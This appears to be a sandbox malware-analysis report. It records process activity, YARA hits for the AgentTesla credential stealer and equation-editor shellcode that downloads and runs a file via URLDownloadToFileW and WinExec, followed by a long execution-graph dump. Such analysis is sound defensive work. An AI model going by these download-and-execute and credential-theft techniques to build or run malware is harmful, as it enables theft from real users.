                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:5
                          Start time:11:54:41
                          Start date:13/12/2024
                          Path:C:\Users\user\AppData\Local\Temp\fryvcftyii.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\fryvcftyii.exe
                          Imagebase:0x3c0000
                          File size:1'051'136 bytes
                          MD5 hash:EF05B0557B2C8F0C951A1B21B812E75F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.478291301.0000000000180000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.478291301.0000000000180000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000005.00000002.478291301.0000000000180000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 74%, ReversingLabs
                          Reputation:low
                          Has exited:true

                          Target ID:6
                          Start time:11:54:42
                          Start date:13/12/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\fryvcftyii.exe
                          Imagebase:0xa50000
                          File size:45'248 bytes
                          MD5 hash:19855C0DC5BEC9FDF925307C57F9F5FC
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.620624233.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.620624233.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.620861905.00000000021A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:moderate
                          Has exited:false


                            Execution Graph

                            Execution Coverage:17.8%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:80.6%
                            Total number of Nodes:72
                            Total number of Limit Nodes:4


                            Control-flow Graph

                            APIs
                            • LoadLibraryW.KERNEL32(036A04F4), ref: 036A0502
                              • Part of subcall function 036A051C: URLDownloadToFileW.URLMON(00000000,036A052D,?,00000000,00000000), ref: 036A057F
                            Memory Dump Source
                            • Source File: 00000002.00000002.478879708.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                            Similarity
                            • API ID: DownloadFileLibraryLoad
                            • String ID:
                            • API String ID: 2776762486-0
                            • Opcode ID: e94b88cf9481e6908cd166b5b753c719fa523c71398657b79e25824b5e70da51
                            • Instruction ID: 473273bf81c33d49448aed5974af6bdc2393bf967255b9ca560e43eaa79cc787
                            • Opcode Fuzzy Hash: e94b88cf9481e6908cd166b5b753c719fa523c71398657b79e25824b5e70da51
                            • Instruction Fuzzy Hash: 6721F4E084CBC12FC712D7740F7AB55BF246B53610F1CCA8EE595091D3A3909A059F66

                            Control-flow Graph

                            APIs
                            • WinExec.KERNEL32(?,00000001), ref: 036A05D5
                              • Part of subcall function 036A05E8: ExitProcess.KERNELBASE(00000000), ref: 036A05ED
                            Memory Dump Source
                            • Source File: 00000002.00000002.478879708.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                            Similarity
                            • API ID: ExecExitProcess
                            • String ID:
                            • API String ID: 4112423671-0
                            • Opcode ID: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
                            • Instruction ID: 14452f3e3fe89a181e45c73f317f8c36e69b37402367c33369ddd9d9931b1ce0
                            • Opcode Fuzzy Hash: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
                            • Instruction Fuzzy Hash: 0BF0F95D904B4311CB74E62C45647BAEB51DBD2208FCCB857949504147D168EDE38E5A

                            Control-flow Graph

                            APIs
                            • URLDownloadToFileW.URLMON(00000000,036A052D,?,00000000,00000000), ref: 036A057F
                            Memory Dump Source
                            • Source File: 00000002.00000002.478879708.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                            Similarity
                            • API ID: DownloadFile
                            • String ID:
                            • API String ID: 1407266417-0
                            • Opcode ID: 573488d0e6a54ab078a07acce31223b24c8acf309325882d5dcd984982034f67
                            • Instruction ID: 84bf57df83f36f937546020fa9643adeed6398dbd7308fe1725bcbd457bd0ba5
                            • Opcode Fuzzy Hash: 573488d0e6a54ab078a07acce31223b24c8acf309325882d5dcd984982034f67
                            • Instruction Fuzzy Hash: 3441F3A084CBC06FC712D7784F6A696BF65BB03610F1CCACFD1D50E1A3D364AA059B66

                            Control-flow Graph

                            APIs
                            • URLDownloadToFileW.URLMON(00000000,036A052D,?,00000000,00000000), ref: 036A057F
                            Memory Dump Source
                            • Source File: 00000002.00000002.478879708.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                            Similarity
                            • API ID: DownloadFile
                            • String ID:
                            • API String ID: 1407266417-0
                            • Opcode ID: bd13d24030d9c2bde2db613ebd633f987f480b2185956e7d9d65a0eb92cfdb32
                            • Instruction ID: 00df4fe7c2d35efb5ad2c5319e146c0431979ad66e4cebd44409b95cdbe3d476
                            • Opcode Fuzzy Hash: bd13d24030d9c2bde2db613ebd633f987f480b2185956e7d9d65a0eb92cfdb32
                            • Instruction Fuzzy Hash: 0A4123A084CBC56FC312DB784F6A655BF647B43210F0CCACED1D50A1D3D3A49A059B66

                            Control-flow Graph

                            Memory Dump Source
                            • Source File: 00000002.00000002.478879708.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                            Similarity
                            • API ID: DownloadFile
                            • String ID:
                            • API String ID: 1407266417-0
                            • Opcode ID: be88e611c56496e43933ae3405814ab347067055421826d976b01dd4bed9f06f
                            • Instruction ID: e90e5b1659adcd5e00ad084a26b6d95caec33800c5892b21c6c93cf8b4960736
                            • Opcode Fuzzy Hash: be88e611c56496e43933ae3405814ab347067055421826d976b01dd4bed9f06f
                            • Instruction Fuzzy Hash: EF11B1E084CBC12FC722D7784E6AB55BF652B52610F1CCACEE1D50E1D3E3A49901DB66

                            Control-flow Graph

                            APIs
                            • URLDownloadToFileW.URLMON(00000000,036A052D,?,00000000,00000000), ref: 036A057F
                            Memory Dump Source
                            • Source File: 00000002.00000002.478879708.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                            Similarity
                            • API ID: DownloadFile
                            • String ID:
                            • API String ID: 1407266417-0
                            • Opcode ID: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
                            • Instruction ID: 7220e37573c88029de044148ba803eece1546f22a17e39515dbf12e2ad31e95e
                            • Opcode Fuzzy Hash: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
                            • Instruction Fuzzy Hash: 0D11AF7494474236D720E75C8E50FA6FB65AFD2714F48E45AE1500D1C6E2A0FCA7CE2A

                            Control-flow Graph

                            APIs
                            • ExitProcess.KERNELBASE(00000000), ref: 036A05ED
                            Memory Dump Source
                            • Source File: 00000002.00000002.478879708.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0
                            • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                            • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                            • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                            • Instruction Fuzzy Hash:

                            Control-flow Graph

                            Memory Dump Source
                            • Source File: 00000002.00000002.478879708.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                            • Instruction ID: 419dd8fe8ddac1a0c45732a32ac084936e79ab9387aeca12857a2fdec6a4cc50
                            • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                            • Instruction Fuzzy Hash: 51D05271202902CFC304DB08CA80E52F37AFFC8210B28C268E0004B719C330ECA2CEA4

                            Control-flow Graph

                            APIs
                            • ExitProcess.KERNELBASE(036A0441), ref: 036A0453
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.478879708.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_36a0000_EQNEDT32.jbxd
                            Similarity
                            • API ID: ExitProcess
                            • String ID: adLibraryW
                            • API String ID: 621844428-2769239626
                            • Opcode ID: c0aaf13b1b31a7b0a9387b2587052652d3a58759d93e7561a730e1ce5deefc4e
                            • Instruction ID: 3bf064668d42ddc82c87606eb206d9be561543be6e74e91cf17f32dadc8bef1a
                            • Opcode Fuzzy Hash: c0aaf13b1b31a7b0a9387b2587052652d3a58759d93e7561a730e1ce5deefc4e
                            • Instruction Fuzzy Hash: 8C11369580EFC09FC312EB385E69159BFA4BE13504B1C45CFC1C44E1A3E6649E06CB72

                            Execution Graph

                            Execution Coverage:4%
                            Dynamic/Decrypted Code Coverage:0.4%
                            Signature Coverage:2.9%
                            Total number of Nodes:2000
                            Total number of Limit Nodes:62
42d147 101052->101053 101301 423a2a 63 API calls Mailbox 101053->101301 101054->100970 101056->101015 101056->101054 101057 42d150 Mailbox 101057->101038 101390 43cadd 101058->101390 101060 43df33 101060->100970 101501 3c9a98 101061->101501 101065 3e0db6 Mailbox 59 API calls 101066 3d1ff4 101065->101066 101069 3d2004 101066->101069 101529 3c57a6 60 API calls Mailbox 101066->101529 101067 406585 101068 3d2029 101067->101068 101533 42f574 59 API calls 101067->101533 101078 3d2036 101068->101078 101534 3c9b3c 59 API calls 101068->101534 101071 3c9837 84 API calls 101069->101071 101073 3d2012 101071->101073 101075 3c57f6 67 API calls 101073->101075 101074 4065cd 101077 4065d5 101074->101077 101074->101078 101076 3d2021 101075->101076 101076->101067 101076->101068 101532 3c58ba CloseHandle 101076->101532 101535 3c9b3c 59 API calls 101077->101535 101079 3c5cdf 2 API calls 101078->101079 101082 3d203d 101079->101082 101083 4065e7 101082->101083 101084 3d2057 101082->101084 101086 3e0db6 Mailbox 59 API calls 101083->101086 101085 3c7667 59 API calls 101084->101085 101087 3d205f 101085->101087 101088 4065ed 101086->101088 101514 3c5572 101087->101514 101092 406601 101088->101092 101536 3c5850 ReadFile SetFilePointerEx 101088->101536 101095 406605 _memmove 101092->101095 101537 4276c4 59 API calls 2 library calls 101092->101537 101093 3d206e 101093->101095 101530 3c9a3c 59 API calls Mailbox 101093->101530 101096 3d2082 Mailbox 101097 3d20bc 101096->101097 101098 3c5c6f CloseHandle 101096->101098 101097->100970 101099 3d20b0 101098->101099 101099->101097 101531 3c58ba CloseHandle 101099->101531 101102 3c7667 59 API calls 101101->101102 101103 43c2f4 101102->101103 101104 3c7667 59 API calls 101103->101104 101105 43c2fc 101104->101105 101106 3c7667 59 API calls 101105->101106 101107 43c304 101106->101107 101108 3c9837 84 API calls 101107->101108 101132 43c312 101108->101132 101109 3c7924 59 API calls 101109->101132 101110 3c7bcc 59 API calls 101110->101132 101111 43c4fb 101112 
43c528 Mailbox 101111->101112 101577 3c9a3c 59 API calls Mailbox 101111->101577 101112->100970 101114 43c4e2 101116 3c7cab 59 API calls 101114->101116 101115 3c8047 59 API calls 101115->101132 101118 43c4ef 101116->101118 101117 43c4fd 101119 3c7cab 59 API calls 101117->101119 101121 3c7b2e 59 API calls 101118->101121 101122 43c50c 101119->101122 101120 3c7e4f 59 API calls 101124 43c3a9 CharUpperBuffW 101120->101124 101121->101111 101125 3c7b2e 59 API calls 101122->101125 101123 3c7e4f 59 API calls 101126 43c469 CharUpperBuffW 101123->101126 101575 3c843a 68 API calls 101124->101575 101125->101111 101576 3cc5a7 69 API calls 2 library calls 101126->101576 101129 3c9837 84 API calls 101129->101132 101130 3c7cab 59 API calls 101130->101132 101131 3c7b2e 59 API calls 101131->101132 101132->101109 101132->101110 101132->101111 101132->101112 101132->101114 101132->101115 101132->101117 101132->101120 101132->101123 101132->101129 101132->101130 101132->101131 101134 427962 101133->101134 101135 3e0db6 Mailbox 59 API calls 101134->101135 101136 427970 101135->101136 101137 42797e 101136->101137 101138 3c7667 59 API calls 101136->101138 101137->100970 101138->101137 101140 43bcb0 101139->101140 101141 43bc96 101139->101141 101579 43a213 59 API calls Mailbox 101140->101579 101578 429e4a 89 API calls 4 library calls 101141->101578 101144 43bcbb 101145 3c9ea0 340 API calls 101144->101145 101146 43bd1c 101145->101146 101147 43bca8 Mailbox 101146->101147 101148 43bdae 101146->101148 101152 43bd5d 101146->101152 101147->100970 101149 43be04 101148->101149 101150 43bdb4 101148->101150 101149->101147 101151 3c9837 84 API calls 101149->101151 101601 42791a 59 API calls 101150->101601 101153 43be16 101151->101153 101580 4272df 59 API calls Mailbox 101152->101580 101155 3c7e4f 59 API calls 101153->101155 101159 43be3a CharUpperBuffW 101155->101159 101156 43bdd7 101602 3c5d41 59 API calls Mailbox 101156->101602 101158 43bd8d 101581 3cf460 101158->101581 101163 43be54 101159->101163 
101162 43bddf Mailbox 101603 3cfce0 341 API calls 2 library calls 101162->101603 101164 43bea7 101163->101164 101166 43be5b 101163->101166 101165 3c9837 84 API calls 101164->101165 101168 43beaf 101165->101168 101604 4272df 59 API calls Mailbox 101166->101604 101605 3c9e5d 60 API calls 101168->101605 101171 43be89 101172 3cf460 340 API calls 101171->101172 101172->101147 101173 43beb9 101173->101147 101174 3c9837 84 API calls 101173->101174 101175 43bed4 101174->101175 101606 3c5d41 59 API calls Mailbox 101175->101606 101177 43bee4 101607 3cfce0 341 API calls 2 library calls 101177->101607 102737 4160c0 101179->102737 101181 41618c 101181->100970 101182->100966 101183->100966 101184->100970 101185->100981 101186->100971 101187->100944 101188->100970 101189->100952 101191 3c805a 101190->101191 101192 3c8052 101190->101192 101191->100964 102742 3c7f77 59 API calls 2 library calls 101192->102742 101194->100978 101195->100978 101196->100978 101197->100964 101198->100965 101199->100964 101200->101006 101201->101006 101202->100999 101203->101004 101204->101010 101205->101004 101207 3c984b 101206->101207 101208 3c9851 101206->101208 101224 3c57f6 101207->101224 101209 3ff5d3 __i64tow 101208->101209 101210 3c9899 101208->101210 101214 3c9857 __itow 101208->101214 101215 3ff4da 101208->101215 101306 3e3698 83 API calls 4 library calls 101210->101306 101213 3e0db6 Mailbox 59 API calls 101216 3c9871 101213->101216 101214->101213 101217 3e0db6 Mailbox 59 API calls 101215->101217 101219 3ff552 Mailbox _wcscpy 101215->101219 101216->101207 101218 3c7de1 59 API calls 101216->101218 101220 3ff51f 101217->101220 101218->101207 101307 3e3698 83 API calls 4 library calls 101219->101307 101221 3e0db6 Mailbox 59 API calls 101220->101221 101222 3ff545 101221->101222 101222->101219 101223 3c7de1 59 API calls 101222->101223 101223->101219 101308 3c5c6f 101224->101308 101228 3c5821 101232 3c5844 101228->101232 101320 3c5610 101228->101320 101230 3c5833 101337 3c527b SetFilePointerEx 
SetFilePointerEx 101230->101337 101232->101030 101232->101031 101233 3c583a 101233->101232 101234 3fdc07 101233->101234 101338 42345a SetFilePointerEx SetFilePointerEx WriteFile 101234->101338 101236 3fdc37 101236->101232 101237->101013 101239 3c7667 59 API calls 101238->101239 101240 3c45b1 101239->101240 101241 3c7667 59 API calls 101240->101241 101242 3c45b9 101241->101242 101243 3c7667 59 API calls 101242->101243 101244 3c45c1 101243->101244 101245 3c7667 59 API calls 101244->101245 101246 3c45c9 101245->101246 101247 3c45fd 101246->101247 101248 3fd4d2 101246->101248 101249 3c784b 59 API calls 101247->101249 101250 3c8047 59 API calls 101248->101250 101251 3c460b 101249->101251 101252 3fd4db 101250->101252 101253 3c7d2c 59 API calls 101251->101253 101254 3c7d8c 59 API calls 101252->101254 101255 3c4615 101253->101255 101257 3c4640 101254->101257 101256 3c784b 59 API calls 101255->101256 101255->101257 101259 3c4636 101256->101259 101260 3c465f 101257->101260 101272 3c4680 101257->101272 101274 3fd4fb 101257->101274 101262 3c7d2c 59 API calls 101259->101262 101374 3c79f2 101260->101374 101261 3c4691 101265 3c46a3 101261->101265 101268 3c8047 59 API calls 101261->101268 101262->101257 101263 3fd5cb 101266 3c7bcc 59 API calls 101263->101266 101269 3c46b3 101265->101269 101270 3c8047 59 API calls 101265->101270 101284 3fd588 101266->101284 101268->101265 101273 3c8047 59 API calls 101269->101273 101275 3c46ba 101269->101275 101270->101269 101271 3c784b 59 API calls 101271->101272 101361 3c784b 101272->101361 101273->101275 101274->101263 101276 3fd5b4 101274->101276 101283 3fd532 101274->101283 101277 3c8047 59 API calls 101275->101277 101286 3c46c1 Mailbox 101275->101286 101276->101263 101278 3fd59f 101276->101278 101277->101286 101281 3c7bcc 59 API calls 101278->101281 101279 3fd590 101280 3c7bcc 59 API calls 101279->101280 101280->101284 101281->101284 101282 3c79f2 59 API calls 101282->101284 101283->101279 101287 3fd57b 101283->101287 101284->101272 
101284->101282 101377 3c7924 59 API calls 2 library calls 101284->101377 101286->101032 101288 3c7bcc 59 API calls 101287->101288 101288->101284 101290 3fec6b 101289->101290 101291 3c7b40 101289->101291 101385 417bdb 59 API calls _memmove 101290->101385 101379 3c7a51 101291->101379 101294 3c7b4c 101294->101038 101298 423c37 101294->101298 101295 3fec75 101296 3c8047 59 API calls 101295->101296 101297 3fec7d Mailbox 101296->101297 101386 42445a GetFileAttributesW 101298->101386 101301->101057 101302->101056 101303->101018 101304->101054 101305->101054 101306->101214 101307->101209 101309 3c5c88 101308->101309 101310 3c5802 101308->101310 101309->101310 101311 3c5c8d CloseHandle 101309->101311 101312 3c5c99 101310->101312 101311->101310 101313 3fdd58 101312->101313 101314 3c5cb2 CreateFileW 101312->101314 101315 3fdd5e CreateFileW 101313->101315 101317 3c5cd4 101313->101317 101314->101317 101316 3fdd84 101315->101316 101315->101317 101339 3c5aee 101316->101339 101317->101228 101321 3c562b 101320->101321 101322 3fdba5 101320->101322 101323 3c5aee 2 API calls 101321->101323 101336 3c56ba 101321->101336 101322->101336 101355 3c5cdf 101322->101355 101324 3c564d 101323->101324 101325 3c522e 59 API calls 101324->101325 101327 3c5657 101325->101327 101327->101322 101328 3c5664 101327->101328 101329 3e0db6 Mailbox 59 API calls 101328->101329 101330 3c566f 101329->101330 101331 3c522e 59 API calls 101330->101331 101332 3c567a 101331->101332 101349 3c5bc0 101332->101349 101335 3c5aee 2 API calls 101335->101336 101336->101230 101337->101233 101338->101236 101346 3c5b08 101339->101346 101340 3c5b8f SetFilePointerEx 101347 3c5c4e SetFilePointerEx 101340->101347 101341 3fdd28 101348 3c5c4e SetFilePointerEx 101341->101348 101344 3c5b63 101344->101317 101345 3fdd42 101346->101340 101346->101341 101346->101344 101347->101344 101348->101345 101350 3c5c33 101349->101350 101354 3c5bce 101349->101354 101360 3c5c4e SetFilePointerEx 101350->101360 101351 3c56a7 101351->101335 101353 3c5c06 
ReadFile 101353->101351 101353->101354 101354->101351 101354->101353 101356 3c5aee 2 API calls 101355->101356 101357 3c5d00 101356->101357 101358 3c5aee 2 API calls 101357->101358 101359 3c5d14 101358->101359 101359->101336 101360->101354 101362 3c785a 101361->101362 101363 3c78b7 101361->101363 101362->101363 101364 3c7865 101362->101364 101365 3c7d2c 59 API calls 101363->101365 101366 3feb09 101364->101366 101367 3c7880 101364->101367 101371 3c7888 _memmove 101365->101371 101368 3c8029 59 API calls 101366->101368 101378 3c7f27 59 API calls Mailbox 101367->101378 101370 3feb13 101368->101370 101372 3e0db6 Mailbox 59 API calls 101370->101372 101371->101261 101373 3feb33 101372->101373 101375 3c7e4f 59 API calls 101374->101375 101376 3c4669 101375->101376 101376->101271 101376->101272 101377->101284 101378->101371 101380 3c7a85 _memmove 101379->101380 101381 3c7a5f 101379->101381 101380->101294 101380->101380 101381->101380 101382 3e0db6 Mailbox 59 API calls 101381->101382 101383 3c7ad4 101382->101383 101384 3e0db6 Mailbox 59 API calls 101383->101384 101384->101380 101385->101295 101387 423c3e 101386->101387 101388 424475 FindFirstFileW 101386->101388 101387->101038 101387->101049 101388->101387 101389 42448a FindClose 101388->101389 101389->101387 101391 3c9837 84 API calls 101390->101391 101392 43cb1a 101391->101392 101415 43cb61 Mailbox 101392->101415 101428 43d7a5 101392->101428 101394 43cdb9 101395 43cf2e 101394->101395 101400 43cdc7 101394->101400 101478 43d8c8 92 API calls Mailbox 101395->101478 101398 43cf3d 101398->101400 101401 43cf49 101398->101401 101399 3c9837 84 API calls 101418 43cbb2 Mailbox 101399->101418 101441 43c96e 101400->101441 101401->101415 101406 43ce00 101456 3e0c08 101406->101456 101409 43ce33 101463 3c92ce 101409->101463 101410 43ce1a 101462 429e4a 89 API calls 4 library calls 101410->101462 101413 43ce25 GetCurrentProcess TerminateProcess 101413->101409 101415->101060 101418->101394 101418->101399 101418->101415 101460 43fbce 59 API 
calls 2 library calls 101418->101460 101461 43cfdf 61 API calls 2 library calls 101418->101461 101419 43cfa4 101419->101415 101424 43cfb8 FreeLibrary 101419->101424 101421 43ce6b 101475 43d649 107 API calls _free 101421->101475 101424->101415 101427 43ce7c 101427->101419 101476 3c8d40 59 API calls Mailbox 101427->101476 101477 3c9d3c 60 API calls Mailbox 101427->101477 101479 43d649 107 API calls _free 101427->101479 101429 3c7e4f 59 API calls 101428->101429 101430 43d7c0 CharLowerBuffW 101429->101430 101480 41f167 101430->101480 101434 3c7667 59 API calls 101435 43d7f9 101434->101435 101436 3c784b 59 API calls 101435->101436 101437 43d810 101436->101437 101439 3c7d2c 59 API calls 101437->101439 101438 43d858 Mailbox 101438->101418 101440 43d81c Mailbox 101439->101440 101440->101438 101487 43cfdf 61 API calls 2 library calls 101440->101487 101442 43c989 101441->101442 101446 43c9de 101441->101446 101443 3e0db6 Mailbox 59 API calls 101442->101443 101445 43c9ab 101443->101445 101444 3e0db6 Mailbox 59 API calls 101444->101445 101445->101444 101445->101446 101447 43da50 101446->101447 101448 43dc79 Mailbox 101447->101448 101455 43da73 _strcat _wcscpy __wsetenvp 101447->101455 101448->101406 101449 3c9b3c 59 API calls 101449->101455 101450 3c9be6 59 API calls 101450->101455 101451 3c9b98 59 API calls 101451->101455 101452 3e571c 58 API calls __crtLCMapStringA_stat 101452->101455 101453 3c9837 84 API calls 101453->101455 101455->101448 101455->101449 101455->101450 101455->101451 101455->101452 101455->101453 101490 425887 61 API calls 2 library calls 101455->101490 101457 3e0c1d 101456->101457 101458 3e0cb5 VirtualProtect 101457->101458 101459 3e0c83 101457->101459 101458->101459 101459->101409 101459->101410 101460->101418 101461->101418 101462->101413 101464 3c92d6 101463->101464 101465 3e0db6 Mailbox 59 API calls 101464->101465 101466 3c92e4 101465->101466 101467 3c92f0 101466->101467 101491 3c91fc 59 API calls Mailbox 101466->101491 101469 3c9050 101467->101469 
101492 3c9160 101469->101492 101471 3c905f 101472 3e0db6 Mailbox 59 API calls 101471->101472 101473 3c90fb 101471->101473 101472->101473 101473->101427 101474 3c8d40 59 API calls Mailbox 101473->101474 101474->101421 101475->101427 101476->101427 101477->101427 101478->101398 101479->101427 101481 41f192 __wsetenvp 101480->101481 101482 41f1d1 101481->101482 101485 41f1c7 101481->101485 101486 41f278 101481->101486 101482->101434 101482->101440 101485->101482 101488 3c78c4 61 API calls 101485->101488 101486->101482 101489 3c78c4 61 API calls 101486->101489 101487->101438 101488->101485 101489->101486 101490->101455 101491->101467 101493 3c9169 Mailbox 101492->101493 101494 3ff19f 101493->101494 101499 3c9173 101493->101499 101495 3e0db6 Mailbox 59 API calls 101494->101495 101497 3ff1ab 101495->101497 101496 3c917a 101496->101471 101499->101496 101500 3c9c90 59 API calls Mailbox 101499->101500 101500->101499 101502 3ff7d6 101501->101502 101504 3c9aa8 101501->101504 101503 3ff7e7 101502->101503 101505 3c7bcc 59 API calls 101502->101505 101506 3c7d8c 59 API calls 101503->101506 101508 3e0db6 Mailbox 59 API calls 101504->101508 101505->101503 101507 3ff7f1 101506->101507 101511 3c9ad4 101507->101511 101513 3c7667 59 API calls 101507->101513 101509 3c9abb 101508->101509 101509->101507 101510 3c9ac6 101509->101510 101510->101511 101512 3c7de1 59 API calls 101510->101512 101511->101065 101511->101067 101512->101511 101513->101511 101515 3c557d 101514->101515 101516 3c55a2 101514->101516 101515->101516 101520 3c558c 101515->101520 101517 3c7d8c 59 API calls 101516->101517 101518 42325e 101517->101518 101522 42328d 101518->101522 101538 4231fa ReadFile SetFilePointerEx 101518->101538 101539 3c7924 59 API calls 2 library calls 101518->101539 101540 3c5ab8 101520->101540 101522->101093 101528 42339c Mailbox 101528->101093 101529->101069 101530->101096 101531->101097 101532->101067 101533->101067 101534->101074 101535->101082 101536->101092 101537->101095 101538->101518 
101539->101518 101541 3e0db6 Mailbox 59 API calls 101540->101541 101542 3c5acb 101541->101542 101543 3e0db6 Mailbox 59 API calls 101542->101543 101544 3c5ad7 101543->101544 101545 3c54d2 101544->101545 101552 3c58cf 101545->101552 101547 3c5bc0 2 API calls 101549 3c54e3 101547->101549 101548 3c5514 101548->101528 101551 3c77da 61 API calls Mailbox 101548->101551 101549->101547 101549->101548 101559 3c5a7a 101549->101559 101551->101528 101553 3fdc3c 101552->101553 101554 3c58e0 101552->101554 101568 415ecd 59 API calls Mailbox 101553->101568 101554->101549 101556 3fdc46 101557 3e0db6 Mailbox 59 API calls 101556->101557 101558 3fdc52 101557->101558 101560 3fdcee 101559->101560 101561 3c5a8e 101559->101561 101574 415ecd 59 API calls Mailbox 101560->101574 101569 3c59b9 101561->101569 101564 3c5a9a 101564->101549 101565 3fdcf9 101566 3e0db6 Mailbox 59 API calls 101565->101566 101567 3fdd0e _memmove 101566->101567 101568->101556 101570 3c59d1 101569->101570 101572 3c59ca _memmove 101569->101572 101571 3e0db6 Mailbox 59 API calls 101570->101571 101573 3fdc7e 101570->101573 101571->101572 101572->101564 101573->101573 101574->101565 101575->101132 101576->101132 101577->101112 101578->101147 101579->101144 101580->101158 101582 3cf4ba 101581->101582 101583 3cf650 101581->101583 101584 3cf4c6 101582->101584 101585 40441e 101582->101585 101586 3c7de1 59 API calls 101583->101586 101608 3cf290 101584->101608 101587 43bc6b 341 API calls 101585->101587 101592 3cf58c Mailbox 101586->101592 101589 40442c 101587->101589 101593 3cf630 101589->101593 101722 429e4a 89 API calls 4 library calls 101589->101722 101591 3cf4fd 101591->101589 101591->101592 101591->101593 101597 423c37 3 API calls 101592->101597 101623 43445a 101592->101623 101632 43df37 101592->101632 101635 42cb7a 101592->101635 101715 3c4e4a 101592->101715 101593->101147 101595 3cf5e3 101595->101593 101721 3c9c90 59 API calls Mailbox 101595->101721 101597->101595 101601->101156 101602->101162 101603->101147 
101604->101171 101605->101173 101606->101177 101607->101147 101609 3cf43a 101608->101609 101611 3cf2bc 101608->101611 101724 429e4a 89 API calls 4 library calls 101609->101724 101611->101609 101620 3cf2f9 _memmove 101611->101620 101612 3cf3d3 101613 3cf3e3 101612->101613 101723 43a2d9 85 API calls Mailbox 101612->101723 101613->101591 101615 3e0db6 59 API calls Mailbox 101615->101620 101616 4043f9 101726 3cf6a3 341 API calls 101616->101726 101617 3c9ea0 341 API calls 101617->101620 101619 4043a9 101619->101591 101620->101612 101620->101615 101620->101616 101620->101617 101620->101619 101621 4043ab 101620->101621 101725 429e4a 89 API calls 4 library calls 101621->101725 101624 3c9837 84 API calls 101623->101624 101625 434494 101624->101625 101727 3c6240 101625->101727 101627 4344a4 101628 4344c9 101627->101628 101629 3c9ea0 341 API calls 101627->101629 101630 3c9a98 59 API calls 101628->101630 101631 4344cd 101628->101631 101629->101628 101630->101631 101631->101595 101633 43cadd 130 API calls 101632->101633 101634 43df47 101633->101634 101634->101595 101636 3c7667 59 API calls 101635->101636 101637 42cbaf 101636->101637 101638 3c7667 59 API calls 101637->101638 101639 42cbb8 101638->101639 101640 42cbcc 101639->101640 101898 3c9b3c 59 